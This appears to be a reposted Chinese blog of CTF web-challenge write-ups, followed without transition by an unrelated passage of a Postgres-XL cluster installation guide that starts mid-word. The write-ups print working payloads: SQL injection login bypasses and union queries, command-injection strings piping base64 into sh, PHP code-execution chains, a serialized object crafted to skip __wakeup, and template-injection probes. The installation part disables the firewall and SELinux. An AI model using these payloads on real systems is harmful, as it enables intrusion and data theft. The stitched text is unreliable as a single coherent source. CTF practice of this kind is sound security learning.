?exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); [De1CTF 2019]SSRF Me 首先得到提示 还有源码 进入题目链接 得到一串py 经过整理后 ! /usr/bin/env pythonencoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_key = os.urandom(16)class Task:def __init__(self, action, param, sign, ip):python得构造方法self.action = actionself.param = paramself.sign = signself.sandbox = md5(ip)if(not os.path.exists(self.sandbox)): SandBox For Remote_Addros.mkdir(self.sandbox)def Exec(self):定义的命令执行函数，此处调用了scan这个自定义的函数result = {}result['code'] = 500if (self.checkSign()):if "scan" in self.action:action要写scantmpfile = open("./%s/result.txt" % self.sandbox, 'w')resp = scan(self.param) 此处是文件读取得注入点if (resp == "Connection Timeout"):result['data'] = respelse:print resp 输出结果tmpfile.write(resp)tmpfile.close()result['code'] = 200if "read" in self.action:action要加readf = open("./%s/result.txt" % self.sandbox, 'r')result['code'] = 200result['data'] = f.read()if result['code'] == 500:result['data'] = "Action Error"else:result['code'] = 500result['msg'] = "Sign Error"return resultdef checkSign(self):if (getSign(self.action, self.param) == self.sign): !!!校验return Trueelse:return Falsegenerate Sign For Action Scan.@app.route("/geneSign", methods=['GET', 'POST']) !!!这个路由用于测试def geneSign():param = urllib.unquote(request.args.get("param", "")) action = "scan"return getSign(action, param)@app.route('/De1ta',methods=['GET','POST'])这个路由是我萌得最终注入点def challenge():action = urllib.unquote(request.cookies.get("action"))param = urllib.unquote(request.args.get("param", ""))sign = urllib.unquote(request.cookies.get("sign"))ip = request.remote_addrif(waf(param)):return "No Hacker!!!!"task = Task(action, param, sign, ip)return json.dumps(task.Exec())@app.route('/')根目录路由，就是显示源代码得地方def index():return open("code.txt","r").read()def scan(param):这是用来扫目录得函数socket.setdefaulttimeout(1)try:return urllib.urlopen(param).read()[:50]except:return "Connection Timeout"def getSign(action, param):!!!这个应该是本题关键点,此处注意顺序先是param后是actionreturn hashlib.md5(secert_key + param + action).hexdigest()def md5(content):return hashlib.md5(content).hexdigest()def waf(param):这个waf比较没用好像check=param.strip().lower()if check.startswith("gopher") or check.startswith("file"):return Trueelse:return Falseif __name__ == '__main__':app.debug = Falseapp.run(host='0.0.0.0') 相关函数 作用 init(self, action, param, …) 构造方法self代表对象,其他是对象的属性 request.args.get(param) 提取get方法传入的，参数名叫param对应得值 request.cookies.get(“action”) 提取cookie信息中的，名为action得对应值 hashlib.md5().hexdigest() hashlib.md5()获取一个md5加密算法对象，hexdigest()是获得加密后的16进制字符串 urllib.unquote(） 将url编码解码 urllib.urlopen() 读取网络文件参数可以是url json.dumps Python 对象编码成 JSON 字符串 这个题先放一下… [极客大挑战 2019]EasySQL 进入题目链接 直接上万能密码 用户随意 admin1' or 1; 得到flag flag{7fc65eb6-985b-494a-8225-de3101a78e89} [极客大挑战 2019]Havefun 进入题目链接 老套路 去F12看看有什么东西 很好 逮住了 获取FLAG的条件是cat=dog，且是get传参 flag就出来了 flag{779b8bac-2d64-4540-b830-1972d70a2db9} [极客大挑战 2019]Secret File 进入题目链接 老套路 先F12查看 发现超链接 直接逮住 既然已经查阅结束了 中间就肯定有一些我们不知道的东西 过去了 上burp看看情况 我们让他挺住 逮住了：secr3t.php 访问一下 简单的绕过 就可以了 成功得到一串字符 进行base解密即可 成功逮住flag flag{ed90509e-d2d1-4161-ae99-74cd27d90ed7} [ACTF2020 新生赛]Include 根据题目信息 是文件包含无疑了 直接点击进来 用php伪协议 绕过就可以了 得到一串编码 base64解密即可 得到flag flag{c09e6921-0c0e-487e-87c9-0937708a78d7} 2018]easy_tornado 都点击一遍 康康 直接filename变量改为：fllllllllllllag 报错了 有提示 render() 是一个渲染函数 具体看这里 就用到SSTI模板注入了 具体看这里 尝试模板注入： /error?msg={ {1} } 发现存在模板注入 md5(cookie_secret+md5(filename)) 分析题目： 1.tornado是一个python的模板，可能会产生SSTI注入漏洞2.flag在/fllllllllllllag中3.render是python中的一个渲染函数，也就是一种模板，通过调用的参数不同，生成不同的网页4.可以推断出filehash的值为md5(cookie_secret+md5(filename)) 根据目前信息，想要得到flag就需要获取cookie_secret 因为tornado存在模版注入漏洞，尝试通过此漏洞获取到所需内容 根据测试页面修改msg得值发现返回值 可以通过msg的值进行修改,而在 taornado框架中存在cookie_secreat 可以通过/error?msg={ {handler.settings} }拿到secreat_cookie 综合以上结果 拿脚本跑一下 得到filehash: ed75a45308da42d3fe98a8f15a2ad36a 一直跑不出来 不知道为啥子 [极客大挑战 2019]LoveSQL 万能密码尝试 直接上万能密码 用户随意 admin1' or 1; 开始正常注入： 查字段：1' order by 3 经过测试 字段为3 查看回显:1’ union select 1,2,3 查数据库 1' union select 1,2,group_concat(schema_name) from information_schema.schemata 查表： [GXYCTF2019]Ping Ping Ping 考察：RCE的防护绕过 直接构造：?ip=127.0.0.1;ls 简单的fuzz一下 就发现=和$没有过滤 所以想到的思路就是使用$IFS$9代替空格，使用拼接变量来拼接出Flag字符串： 构造playload ?ip=127.0.0.1;a=fl;b=ag;cat$IFS$9$a$b 看看他到底过滤了什么：?ip=127.0.0.1;cat$IFS$1index.php 一目了然过滤了啥，flag字眼也过滤了，bash也没了，不过sh没过滤： 继续构造payload： ?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 查看源码，得到flag flag{1fe312b4-96a0-492d-9b97-040c7e333c1a} [RoarCTF 2019]Easy Calc 进入题目链接 查看源码 发现calc.php 利用PHP的字符串解析特性Bypass，具体看这里 HP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事： 1.删除空白符2.将某些字符转换为下划线（包括空格） scandir()：列出参数目录中的文件和目录 发现/被过滤了 ，可以用chr('47')代替 calc.php? num=1;var_dump(scandir(chr(47))) 这里直接上playload calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) flag{76243df6-aecb-4dc5-879e-3964ec7485ee} [极客大挑战 2019]Knife 进入题目链接 根据题目Knife 还有这个一句话木马 猜想尝试用蚁剑连接 测试连接成功 确实是白给了flag [ACTF2020 新生赛]Exec 直接ping 发现有回显 构造playload： 127.0.0.1;cat /flag 成功拿下flag flag{7e582f16-2676-42fa-8b9d-f9d7584096a6} [极客大挑战 2019]PHP 进入题目链接 它提到了备份文件 就肯定是扫目录 把源文件的代码 搞出来 上dirsearch 下载看这里 很简单的使用方法 用来扫目录 -u 指定url -e 指定网站语言 -w 可以加上自己的字典，要带路径 -r 递归跑(查到一个目录后，重复跑) 打开index.php文件 分析这段内容 1.加载了一个class.php文件 2.采用get方式传递一个select参数 3.随后将之反序列化 打开class.php <?phpinclude 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();} }}?> 根据代码的意思可以知道，如果password=100，username=admin 在执行_destruct()的时候可以获得flag 构造序列化 <?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;} }$a = new Name('admin', 100);var_dump(serialize($a));?> 得到了序列化 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 但是 还有要求 1.跳过__wakeup()函数 在反序列化字符串时，属性个数的值大于实际属性个数时，就可以 2.private修饰符的问题 private 声明的字段为私有字段，只在所声明的类中可见，在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时，类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度 构造最终的playload ?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;} [极客大挑战 2019]Http 进入题目链接 查看 源码 发现了 超链接的标签 说我们不是从https://www.Sycsecret.com访问的 进入http://node3.buuoj.cn:27883/Secret.php 抓包修改一下Referer 执行一下 随后提示我们浏览器需要使用Syclover， 修改一下User-Agent的内容 就拿到flag了 [HCTF 2018]admin 进入题目链接 这道题有三种解法 1.flask session 伪造 2.unicode欺骗 3.条件竞争 发现 登录和注册功能 随意注册一个账号啦 登录进来之后 登录 之后 查看源码 发现提示 猜测 我们登录 admin账号 即可看见flag 在change password页面发现 访问后 取得源码 第一种方法： flask session 伪造 具体，看这里 flask中session是存储在客户端cookie中的，也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是，签名的作用是防篡改，而无法防止被读取。而flask并没有提供加密操作，所以其session的全部内容都是可以在客户端读取的，这就可能造成一些安全问题。 [极客大挑战 2019]BabySQL 进入题目链接 对用户名进行测试 发现有一些关键字被过滤掉了 猜测后端使用replace()函数过滤 11' oorr 1=1 直接尝试双写 万能密码尝试 双写 可以绕过 查看回显： 1' uniunionon selselectect 1,2,3 over！正常 开始注入 爆库 爆列 爆表 爆内容 本篇文章为转载内容。原文链接：https://blog.csdn.net/wo41ge/article/details/109162753。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...tice公司及其收购数据库技术公司–StormDB的产品。Postgres-XL是一个横向扩展的开源数据库集群，具有足够的灵活性来处理不同的数据库任务。 Postgres-XL功能特性 开放源代码：（源协议使用宽松的“Mozilla Public License”许可，允许将开源代码与闭源代码混在一起使用。） 完全的ACID支持 可横向扩展的关系型数据库（RDBMS） 支持OLAP应用，采用MPP（Massively Parallel Processing：大规模并行处理系统）架构模式 支持OLTP应用，读写性能可扩展 集群级别的ACID特性 多租户安全 也可被用作分布式Key-Value存储 事务处理与数据分析处理混合型数据库 支持丰富的SQL语句类型，比如：关联子查询 支持绝大部分PostgreSQL的SQL语句 分布式多版本并发控制（MVCC：Multi-version Concurrency Control） 支持JSON和XML格式 Postgres-XL缺少的功能 内建的高可用机制 使用外部机制实现高可能，如：Corosync/Pacemaker 有未来功能提升的空间 增加节点/重新分片数据（re-shard）的简便性 数据重分布（redistribution）期间会锁表 可采用预分片（pre-shard）方式解决，在同台物理服务器上建立多个数据节点，每个节点存储一个数据分片。数据重分布时，将一些数据节点迁出即可 某些外键、唯一性约束功能 Postgres-XL架构 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-M9lFuEIP-1640133702200)(./assets/postgre-xl.jpg)] 基于开源项目Postgres-XC XL增加了MPP，允许数据节点间直接通讯，交换复杂跨节点关联查询相关数据信息，减少协调器负载。 多个协调器（Coordinator） 应用程序的数据库连入点 分析查询语句，生成执行计划 多个数据节点（DataNode） 实际的数据存储 数据自动打散分布到集群中各数据节点 本地执行查询 一个查询在所有相关节点上并行查询 全局事务管理器（GTM：Global Transaction Manager） 提供事务间一致性视图 部署GTM Proxy实例，以提高性能 Postgre-XL主要组件 GTM (Global Transaction Manager) - 全局事务管理器 GTM是Postgres-XL的一个关键组件，用于提供一致的事务管理和元组可见性控制。 GTM Standby GTM的备节点，在pgxc,pgxl中，GTM控制所有的全局事务分配，如果出现问题，就会导致整个集群不可用，为了增加可用性，增加该备用节点。当GTM出现问题时，GTM Standby可以升级为GTM，保证集群正常工作。 GTM-Proxy GTM需要与所有的Coordinators通信，为了降低压力，可以在每个Coordinator机器上部署一个GTM-Proxy。 Coordinator --协调器 协调器是应用程序到数据库的接口。它的作用类似于传统的PostgreSQL后台进程，但是协调器不存储任何实际数据。实际数据由数据节点存储。协调器接收SQL语句，根据需要获取全局事务Id和全局快照，确定涉及哪些数据节点，并要求它们执行(部分)语句。当向数据节点发出语句时，它与GXID和全局快照相关联，以便多版本并发控制(MVCC)属性扩展到集群范围。 Datanode --数据节点 用于实际存储数据。表可以分布在各个数据节点之间，也可以复制到所有数据节点。数据节点没有整个数据库的全局视图，它只负责本地存储的数据。接下来，协调器将检查传入语句，并制定子计划。然后，根据需要将这些数据连同GXID和全局快照一起传输到涉及的每个数据节点。数据节点可以在不同的会话中接收来自各个协调器的请求。但是，由于每个事务都是惟一标识的，并且与一致的(全局)快照相关联，所以每个数据节点都可以在其事务和快照上下文中正确执行。 Postgres-XL继承了PostgreSQL Postgres-XL是PostgreSQL的扩展并继承了其很多特性： 复杂查询 外键 触发器 视图 事务 MVCC(多版本控制) 此外，类似于PostgreSQL，用户可以通过多种方式扩展Postgres-XL，例如添加新的 数据类型 函数 操作 聚合函数 索引类型 过程语言 安装 环境说明 由于资源有限，gtm一台、另外两台身兼数职。 主机名 IP 角色 端口 nodename 数据目录 gtm 192.168.20.132 GTM 6666 gtm /nodes/gtm 协调器 5432 coord1 /nodes/coordinator xl1 192.168.20.133 数据节点 5433 node1 /nodes/pgdata gtm代理 6666 gtmpoxy01 /nodes/gtm_pxy1 协调器 5432 coord2 /nodes/coordinator xl2 192.168.20.134 数据节点 5433 node2 /nodes/pgdata gtm代理 6666 gtmpoxy02 /nodes/gtm_pxy2 要求 GNU make版本 3.8及以上版本 [root@pg ~] make --versionGNU Make 3.82Built for x86_64-redhat-linux-gnuCopyright (C) 2010 Free Software Foundation, Inc.License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>This is free software: you are free to change and redistribute it.There is NO WARRANTY, to the extent permitted by law. 需安装GCC包 需安装tar包 用于解压缩文件 默认需要GNU Readline library 其作用是可以让psql命令行记住执行过的命令，并且可以通过键盘上下键切换命令。但是可以通过--without-readline禁用这个特性，或者可以指定--withlibedit-preferred选项来使用libedit 默认使用zlib压缩库 可通过--without-zlib选项来禁用 配置hosts 所有主机上都配置 [root@xl2 11] cat /etc/hosts127.0.0.1 localhost192.168.20.132 gtm192.168.20.133 xl1192.168.20.134 xl2 关闭防火墙、Selinux 所有主机都执行 关闭防火墙： [root@gtm ~] systemctl stop firewalld.service[root@gtm ~] systemctl disable firewalld.service selinux设置: [root@gtm ~]vim /etc/selinux/config 设置SELINUX=disabled，保存退出。 This file controls the state of SELinux on the system. SELINUX= can take one of these three values: enforcing - SELinux security policy is enforced. permissive - SELinux prints warnings instead of enforcing. disabled - No SELinux policy is loaded.SELINUX=disabled SELINUXTYPE= can take one of three two values: targeted - Targeted processes are protected, minimum - Modification of targeted policy. Only selected processes are protected. mls - Multi Level Security protection. 安装依赖包 所有主机上都执行 yum install -y flex bison readline-devel zlib-devel openjade docbook-style-dsssl gcc 创建用户 所有主机上都执行 [root@gtm ~] useradd postgres[root@gtm ~] passwd postgres[root@gtm ~] su - postgres[root@gtm ~] mkdir ~/.ssh[root@gtm ~] chmod 700 ~/.ssh 配置SSH免密登录 仅仅在gtm节点配置如下操作： [root@gtm ~] su - postgres[postgres@gtm ~] ssh-keygen -t rsa[postgres@gtm ~] cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys[postgres@gtm ~] chmod 600 ~/.ssh/authorized_keys 将刚生成的认证文件拷贝到xl1到xl2中，使得gtm节点可以免密码登录xl1~xl2的任意一个节点： [postgres@gtm ~] scp ~/.ssh/authorized_keys postgres@xl1:~/.ssh/[postgres@gtm ~] scp ~/.ssh/authorized_keys postgres@xl2:~/.ssh/ 对所有提示都不要输入，直接enter下一步。直到最后，因为第一次要求输入目标机器的用户密码，输入即可。 下载源码 下载地址：https://www.postgres-xl.org/download/ [root@slave ~] ll postgres-xl-10r1.1.tar.gz-rw-r--r-- 1 root root 28121666 May 30 05:21 postgres-xl-10r1.1.tar.gz 编译、安装Postgres-XL 所有节点都安装，编译需要一点时间，最好同时进行编译。 [root@slave ~] tar xvf postgres-xl-10r1.1.tar.gz[root@slave ~] ./configure --prefix=/home/postgres/pgxl/[root@slave ~] make[root@slave ~] make install[root@slave ~] cd contrib/ --安装必要的工具,在gtm节点上安装即可[root@slave ~] make[root@slave ~] make install 配置环境变量 所有节点都要配置 进入postgres用户，修改其环境变量，开始编辑 [root@gtm ~]su - postgres[postgres@gtm ~]vi .bashrc --不是.bash_profile 在打开的文件末尾，新增如下变量配置： export PGHOME=/home/postgres/pgxlexport LD_LIBRARY_PATH=$PGHOME/lib:$LD_LIBRARY_PATHexport PATH=$PGHOME/bin:$PATH 按住esc，然后输入:wq!保存退出。输入以下命令对更改重启生效。 [postgres@gtm ~] source .bashrc --不是.bash_profile 输入以下语句，如果输出变量结果，代表生效 [postgres@gtm ~] echo $PGHOME 应该输出/home/postgres/pgxl代表生效 配置集群 生成pgxc_ctl.conf配置文件 [postgres@gtm ~] pgxc_ctl prepare/bin/bashInstalling pgxc_ctl_bash script as /home/postgres/pgxl/pgxc_ctl/pgxc_ctl_bash.ERROR: File "/home/postgres/pgxl/pgxc_ctl/pgxc_ctl.conf" not found or not a regular file. No such file or directoryInstalling pgxc_ctl_bash script as /home/postgres/pgxl/pgxc_ctl/pgxc_ctl_bash.Reading configuration using /home/postgres/pgxl/pgxc_ctl/pgxc_ctl_bash --home /home/postgres/pgxl/pgxc_ctl --configuration /home/postgres/pgxl/pgxc_ctl/pgxc_ctl.confFinished reading configuration. PGXC_CTL START Current directory: /home/postgres/pgxl/pgxc_ctl 配置pgxc_ctl.conf 新建/home/postgres/pgxc_ctl/pgxc_ctl.conf文件，编辑如下： 对着模板文件一个一个修改，否则会造成初始化过程出现各种神奇问题。 pgxcInstallDir=$PGHOMEpgxlDATA=$PGHOME/data pgxcOwner=postgres---- GTM Master -----------------------------------------gtmName=gtmgtmMasterServer=gtmgtmMasterPort=6666gtmMasterDir=$pgxlDATA/nodes/gtmgtmSlave=y Specify y if you configure GTM Slave. Otherwise, GTM slave will not be configured and all the following variables will be reset.gtmSlaveName=gtmSlavegtmSlaveServer=gtm value none means GTM slave is not available. Give none if you don't configure GTM Slave.gtmSlavePort=20001 Not used if you don't configure GTM slave.gtmSlaveDir=$pgxlDATA/nodes/gtmSlave Not used if you don't configure GTM slave.---- GTM-Proxy Master -------gtmProxyDir=$pgxlDATA/nodes/gtm_proxygtmProxy=y gtmProxyNames=(gtm_pxy1 gtm_pxy2) gtmProxyServers=(xl1 xl2) gtmProxyPorts=(6666 6666) gtmProxyDirs=($gtmProxyDir $gtmProxyDir) ---- Coordinators ---------coordMasterDir=$pgxlDATA/nodes/coordcoordNames=(coord1 coord2) coordPorts=(5432 5432) poolerPorts=(6667 6667) coordPgHbaEntries=(0.0.0.0/0)coordMasterServers=(xl1 xl2) coordMasterDirs=($coordMasterDir $coordMasterDir)coordMaxWALsernder=0 没设置备份节点，设置为0coordMaxWALSenders=($coordMaxWALsernder $coordMaxWALsernder) 数量保持和coordMasterServers一致coordSlave=n---- Datanodes ----------datanodeMasterDir=$pgxlDATA/nodes/dn_masterprimaryDatanode=xl1 主数据节点datanodeNames=(node1 node2)datanodePorts=(5433 5433) datanodePoolerPorts=(6668 6668) datanodePgHbaEntries=(0.0.0.0/0)datanodeMasterServers=(xl1 xl2)datanodeMasterDirs=($datanodeMasterDir $datanodeMasterDir)datanodeMaxWalSender=4datanodeMaxWALSenders=($datanodeMaxWalSender $datanodeMaxWalSender) 集群初始化，启动，停止 初始化 pgxc_ctl -c /home/postgres/pgxc_ctl/pgxc_ctl.conf init all 输出结果： /bin/bashInstalling pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Installing pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Reading configuration using /home/postgres/pgxc_ctl/pgxc_ctl_bash --home /home/postgres/pgxc_ctl --configuration /home/postgres/pgxc_ctl/pgxc_ctl.conf/home/postgres/pgxc_ctl/pgxc_ctl.conf: line 189: $coordExtraConfig: ambiguous redirectFinished reading configuration. PGXC_CTL START Current directory: /home/postgres/pgxc_ctlStopping all the coordinator masters.Stopping coordinator master coord1.Stopping coordinator master coord2.pg_ctl: directory "/home/postgres/pgxc/nodes/coord/coord1" does not existpg_ctl: directory "/home/postgres/pgxc/nodes/coord/coord2" does not existDone.Stopping all the datanode masters.Stopping datanode master datanode1.Stopping datanode master datanode2.pg_ctl: PID file "/home/postgres/pgxc/nodes/datanode/datanode1/postmaster.pid" does not existIs server running?Done.Stop GTM masterwaiting for server to shut down.... doneserver stopped[postgres@gtm ~]$ echo $PGHOME/home/postgres/pgxl[postgres@gtm ~]$ ll /home/postgres/pgxl/pgxc/nodes/gtm/gtm.^C[postgres@gtm ~]$ pgxc_ctl -c /home/postgres/pgxc_ctl/pgxc_ctl.conf init all/bin/bashInstalling pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Installing pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Reading configuration using /home/postgres/pgxc_ctl/pgxc_ctl_bash --home /home/postgres/pgxc_ctl --configuration /home/postgres/pgxc_ctl/pgxc_ctl.conf/home/postgres/pgxc_ctl/pgxc_ctl.conf: line 189: $coordExtraConfig: ambiguous redirectFinished reading configuration. PGXC_CTL START Current directory: /home/postgres/pgxc_ctlInitialize GTM masterERROR: target directory (/home/postgres/pgxc/nodes/gtm) exists and not empty. Skip GTM initilializationDone.Start GTM masterserver startingInitialize all the coordinator masters.Initialize coordinator master coord1.ERROR: target coordinator master coord1 is running now. Skip initilialization.Initialize coordinator master coord2.The files belonging to this database system will be owned by user "postgres".This user must also own the server process.The database cluster will be initialized with locale "en_US.UTF-8".The default database encoding has accordingly been set to "UTF8".The default text search configuration will be set to "english".Data page checksums are disabled.fixing permissions on existing directory /home/postgres/pgxc/nodes/coord/coord2 ... okcreating subdirectories ... okselecting default max_connections ... 100selecting default shared_buffers ... 128MBselecting dynamic shared memory implementation ... posixcreating configuration files ... okrunning bootstrap script ... okperforming post-bootstrap initialization ... creating cluster information ... oksyncing data to disk ... okfreezing database template0 ... okfreezing database template1 ... okfreezing database postgres ... okWARNING: enabling "trust" authentication for local connectionsYou can change this by editing pg_hba.conf or using the option -A, or--auth-local and --auth-host, the next time you run initdb.Success.Done.Starting coordinator master.Starting coordinator master coord1ERROR: target coordinator master coord1 is already running now. Skip initialization.Starting coordinator master coord22019-05-30 21:09:25.562 EDT [2148] LOG: listening on IPv4 address "0.0.0.0", port 54322019-05-30 21:09:25.562 EDT [2148] LOG: listening on IPv6 address "::", port 54322019-05-30 21:09:25.563 EDT [2148] LOG: listening on Unix socket "/tmp/.s.PGSQL.5432"2019-05-30 21:09:25.601 EDT [2149] LOG: database system was shut down at 2019-05-30 21:09:22 EDT2019-05-30 21:09:25.605 EDT [2148] LOG: database system is ready to accept connections2019-05-30 21:09:25.612 EDT [2156] LOG: cluster monitor startedDone.Initialize all the datanode masters.Initialize the datanode master datanode1.Initialize the datanode master datanode2.The files belonging to this database system will be owned by user "postgres".This user must also own the server process.The database cluster will be initialized with locale "en_US.UTF-8".The default database encoding has accordingly been set to "UTF8".The default text search configuration will be set to "english".Data page checksums are disabled.fixing permissions on existing directory /home/postgres/pgxc/nodes/datanode/datanode1 ... okcreating subdirectories ... okselecting default max_connections ... 100selecting default shared_buffers ... 128MBselecting dynamic shared memory implementation ... posixcreating configuration files ... okrunning bootstrap script ... okperforming post-bootstrap initialization ... creating cluster information ... oksyncing data to disk ... okfreezing database template0 ... okfreezing database template1 ... okfreezing database postgres ... okWARNING: enabling "trust" authentication for local connectionsYou can change this by editing pg_hba.conf or using the option -A, or--auth-local and --auth-host, the next time you run initdb.Success.The files belonging to this database system will be owned by user "postgres".This user must also own the server process.The database cluster will be initialized with locale "en_US.UTF-8".The default database encoding has accordingly been set to "UTF8".The default text search configuration will be set to "english".Data page checksums are disabled.fixing permissions on existing directory /home/postgres/pgxc/nodes/datanode/datanode2 ... okcreating subdirectories ... okselecting default max_connections ... 100selecting default shared_buffers ... 128MBselecting dynamic shared memory implementation ... posixcreating configuration files ... okrunning bootstrap script ... okperforming post-bootstrap initialization ... creating cluster information ... oksyncing data to disk ... okfreezing database template0 ... okfreezing database template1 ... okfreezing database postgres ... okWARNING: enabling "trust" authentication for local connectionsYou can change this by editing pg_hba.conf or using the option -A, or--auth-local and --auth-host, the next time you run initdb.Success.Done.Starting all the datanode masters.Starting datanode master datanode1.WARNING: datanode master datanode1 is running now. Skipping.Starting datanode master datanode2.2019-05-30 21:09:33.352 EDT [2404] LOG: listening on IPv4 address "0.0.0.0", port 154322019-05-30 21:09:33.352 EDT [2404] LOG: listening on IPv6 address "::", port 154322019-05-30 21:09:33.355 EDT [2404] LOG: listening on Unix socket "/tmp/.s.PGSQL.15432"2019-05-30 21:09:33.392 EDT [2404] LOG: redirecting log output to logging collector process2019-05-30 21:09:33.392 EDT [2404] HINT: Future log output will appear in directory "pg_log".Done.psql: FATAL: no pg_hba.conf entry for host "192.168.20.132", user "postgres", database "postgres"psql: FATAL: no pg_hba.conf entry for host "192.168.20.132", user "postgres", database "postgres"Done.psql: FATAL: no pg_hba.conf entry for host "192.168.20.132", user "postgres", database "postgres"psql: FATAL: no pg_hba.conf entry for host "192.168.20.132", user "postgres", database "postgres"Done.[postgres@gtm ~]$ pgxc_ctl -c /home/postgres/pgxc_ctl/pgxc_ctl.conf stop all/bin/bashInstalling pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Installing pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Reading configuration using /home/postgres/pgxc_ctl/pgxc_ctl_bash --home /home/postgres/pgxc_ctl --configuration /home/postgres/pgxc_ctl/pgxc_ctl.conf/home/postgres/pgxc_ctl/pgxc_ctl.conf: line 189: $coordExtraConfig: ambiguous redirectFinished reading configuration. PGXC_CTL START Current directory: /home/postgres/pgxc_ctlStopping all the coordinator masters.Stopping coordinator master coord1.Stopping coordinator master coord2.pg_ctl: directory "/home/postgres/pgxc/nodes/coord/coord1" does not existDone.Stopping all the datanode masters.Stopping datanode master datanode1.Stopping datanode master datanode2.pg_ctl: PID file "/home/postgres/pgxc/nodes/datanode/datanode1/postmaster.pid" does not existIs server running?Done.Stop GTM masterwaiting for server to shut down.... doneserver stopped[postgres@gtm ~]$ pgxc_ctl/bin/bashInstalling pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Installing pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Reading configuration using /home/postgres/pgxc_ctl/pgxc_ctl_bash --home /home/postgres/pgxc_ctl --configuration /home/postgres/pgxc_ctl/pgxc_ctl.conf/home/postgres/pgxc_ctl/pgxc_ctl.conf: line 189: $coordExtraConfig: ambiguous redirectFinished reading configuration. PGXC_CTL START Current directory: /home/postgres/pgxc_ctlPGXC monitor allNot running: gtm masterRunning: coordinator master coord1Not running: coordinator master coord2Running: datanode master datanode1Not running: datanode master datanode2PGXC stop coordinator master coord1Stopping coordinator master coord1.pg_ctl: directory "/home/postgres/pgxc/nodes/coord/coord1" does not existDone.PGXC stop datanode master datanode1Stopping datanode master datanode1.pg_ctl: PID file "/home/postgres/pgxc/nodes/datanode/datanode1/postmaster.pid" does not existIs server running?Done.PGXC monitor allNot running: gtm masterRunning: coordinator master coord1Not running: coordinator master coord2Running: datanode master datanode1Not running: datanode master datanode2PGXC monitor allNot running: gtm masterNot running: coordinator master coord1Not running: coordinator master coord2Not running: datanode master datanode1Not running: datanode master datanode2PGXC exit[postgres@gtm ~]$ pgxc_ctl -c /home/postgres/pgxc_ctl/pgxc_ctl.conf init all/bin/bashInstalling pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Installing pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash.Reading configuration using /home/postgres/pgxc_ctl/pgxc_ctl_bash --home /home/postgres/pgxc_ctl --configuration /home/postgres/pgxc_ctl/pgxc_ctl.conf/home/postgres/pgxc_ctl/pgxc_ctl.conf: line 189: $coordExtraConfig: ambiguous redirectFinished reading configuration. PGXC_CTL START Current directory: /home/postgres/pgxc_ctlInitialize GTM masterERROR: target directory (/home/postgres/pgxc/nodes/gtm) exists and not empty. Skip GTM initilializationDone.Start GTM masterserver startingInitialize all the coordinator masters.Initialize coordinator master coord1.Initialize coordinator master coord2.The files belonging to this database system will be owned by user "postgres".This user must also own the server process.The database cluster will be initialized with locale "en_US.UTF-8".The default database encoding has accordingly been set to "UTF8".The default text search configuration will be set to "english".Data page checksums are disabled.fixing permissions on existing directory /home/postgres/pgxc/nodes/coord/coord1 ... okcreating subdirectories ... okselecting default max_connections ... 100selecting default shared_buffers ... 128MBselecting dynamic shared memory implementation ... posixcreating configuration files ... okrunning bootstrap script ... okperforming post-bootstrap initialization ... creating cluster information ... oksyncing data to disk ... okfreezing database template0 ... okfreezing database template1 ... okfreezing database postgres ... okWARNING: enabling "trust" authentication for local connectionsYou can change this by editing pg_hba.conf or using the option -A, or--auth-local and --auth-host, the next time you run initdb.Success.The files belonging to this database system will be owned by user "postgres".This user must also own the server process.The database cluster will be initialized with locale "en_US.UTF-8".The default database encoding has accordingly been set to "UTF8".The default text search configuration will be set to "english".Data page checksums are disabled.fixing permissions on existing directory /home/postgres/pgxc/nodes/coord/coord2 ... okcreating subdirectories ... okselecting default max_connections ... 100selecting default shared_buffers ... 128MBselecting dynamic shared memory implementation ... posixcreating configuration files ... okrunning bootstrap script ... okperforming post-bootstrap initialization ... creating cluster information ... oksyncing data to disk ... okfreezing database template0 ... okfreezing database template1 ... okfreezing database postgres ... okWARNING: enabling "trust" authentication for local connectionsYou can change this by editing pg_hba.conf or using the option -A, or--auth-local and --auth-host, the next time you run initdb.Success.Done.Starting coordinator master.Starting coordinator master 